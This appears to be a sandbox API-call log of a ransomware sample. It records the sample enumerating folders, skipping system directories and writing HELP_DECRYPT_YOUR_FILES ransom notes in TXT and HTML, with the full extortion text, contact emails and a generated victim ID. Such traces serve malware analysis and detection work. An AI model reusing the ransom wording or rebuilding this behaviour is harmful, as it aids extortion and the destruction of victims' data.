	[0167.001] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d0bd5c7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d0bd5c7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d0e37c8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.001] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d0bd5c7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d0bd5c7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d0e37c8, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0167.001] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.001] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.002] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1
	[0167.002] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1
	[0167.002] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1
	[0167.002] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA"
	[0167.002] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\"
	[0167.002] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\", lpString2="S-1-5-18" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18"
	[0167.002] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18"
	[0167.003] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\"
	[0167.003] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\"
	[0167.003] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*"
	[0167.003] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.004] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 52
	[0167.004] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.004] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*") returned 0x34
	[0167.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="windows") returned 0x0
	[0167.004] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.004] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="boot") returned 0x0
	[0167.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="system volume information") returned 0x0
	[0167.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="temp") returned 0x0
	[0167.005] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.005] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="program files") returned 0x0
	[0167.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="appdata") returned 0x0
	[0167.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.006] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="application data") returned 0x0
	[0167.006] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="winnt") returned 0x0
	[0167.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="tmp") returned 0x0
	[0167.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="cache") returned 0x0
	[0167.007] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.007] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.008] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="webcache") returned 0x0
	[0167.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.008] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="inetcache") returned 0x0
	[0167.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.008] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="nvidia") returned 0x0
	[0167.008] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="packages") returned 0x0
	[0167.009] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="cookies") returned 0x0
	[0167.009] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.009] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="programdata") returned 0x0
	[0167.009] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.009] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc70b72, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc70b72, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="4ECCD1~1")) returned 1
	[0167.009] lstrcmpW (lpString1="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2="..") returned 1
	[0167.010] lstrcmpW (lpString1="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", lpString2=".") returned 1
	[0167.010] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\"
	[0167.010] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\", lpString2="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778"
	[0167.010] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 118
	[0167.010] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.010] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cchLength=0x76 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 0x76
	[0167.010] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.010] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.011] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778" | out: lpString1="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778"
	[0167.011] lstrlenW (lpString="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778") returned 118
	[0167.011] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.011] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.011] StrStrW (lpFirst="2f-8c0f-c90408af5778", lpSrch=".") returned 0x0
	[0167.011] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xc70b72, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc70b72, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xc70b72, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="4eccd106f69e31c1b12304e5463bb71d_03845cb8-7441-4a2f-8c0f-c90408af5778", cAlternateFileName="4ECCD1~1")) returned 0
	[0167.012] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.012] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.012] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18"
	[0167.012] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*"
	[0167.012] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.013] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.013] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HELP_DECRYPT_YOUR_FILES.TXT") returned 76
	[0167.013] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.014] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.014] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.017] CloseHandle (hObject=0x390) returned 1
	[0167.018] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.018] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.019] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0167.020] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.020] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.020] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.020] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.021] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0167.021] CloseHandle (hObject=0x390) returned 1
	[0167.021] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.021] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.022] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.022] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HELP_DECRYPT_YOUR_FILES.HTML") returned 77
	[0167.022] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.040] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.040] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0167.043] CloseHandle (hObject=0x390) returned 1
	[0167.044] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.044] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.044] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.045] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0167.046] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.046] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0167.046] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.046] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.046] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0167.048] CloseHandle (hObject=0x390) returned 1
	[0167.048] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc4a8a1, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xc4a8a1, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x7d17c235, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.049] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*") returned 52
	[0167.049] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.049] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*.*", cchLength=0x34 | out: lpsz="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*") returned 0x34
	[0167.049] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="windows") returned 0x0
	[0167.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="boot") returned 0x0
	[0167.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.050] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="system volume information") returned 0x0
	[0167.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.051] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.051] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="temp") returned 0x0
	[0167.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.051] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="program files") returned 0x0
	[0167.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.051] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="appdata") returned 0x0
	[0167.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.052] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\*.*", lpSrch="application data") returned 0x0
